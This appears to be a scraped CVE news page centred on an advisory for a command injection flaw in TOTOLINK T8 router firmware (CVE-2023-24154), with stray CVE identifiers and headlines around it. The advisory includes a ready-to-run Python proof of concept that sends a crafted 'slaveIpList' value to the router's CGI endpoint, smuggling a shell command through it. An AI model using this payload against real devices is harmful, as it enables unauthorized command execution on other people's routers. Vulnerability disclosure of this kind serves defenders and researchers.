CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW.

TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW

In function sub_421678,The "slaveIpList" parameter does not filter user input, which can cause command injection vulnerabilities

    import requests
    url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {'FileName':'aa', 'slaveIpList':'0\"|ls />/tmp/setUpgradeFW.txt|echo \"22', 'topicurl':'setting/setUpgradeFW'}
    rep = requests.post(url, cookies=cookie, json=data)
    print(rep.status_code)
    print(rep.text)

Headline

CVE-2023-24154: CVE-vulns/setUpgradeFW.md at main · Double-q1015/CVE-vulns

CVE: Latest News